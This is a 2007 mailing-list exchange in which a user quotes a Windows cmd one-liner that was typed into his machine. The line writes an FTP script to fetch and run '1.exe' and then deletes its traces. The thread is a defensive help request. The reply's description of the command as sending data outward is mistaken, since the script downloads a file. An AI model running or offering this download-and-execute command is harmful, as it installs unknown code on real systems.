[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: spooky windows script

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis <jan.outhuis@orange.nl> wrote:

> Hello,
> Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> After that all is back to normal.
> Now this is of course a nuisance, but is it also a thread? And what can be done against it?
> Anybody got a clue on this?
> Tia,
> Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

mailmin.sourceforge.net - remote access via secure (OpenPGP) email
ssuds.sourceforge.net - A Simple Sudoku Solver and Generator

Reply to: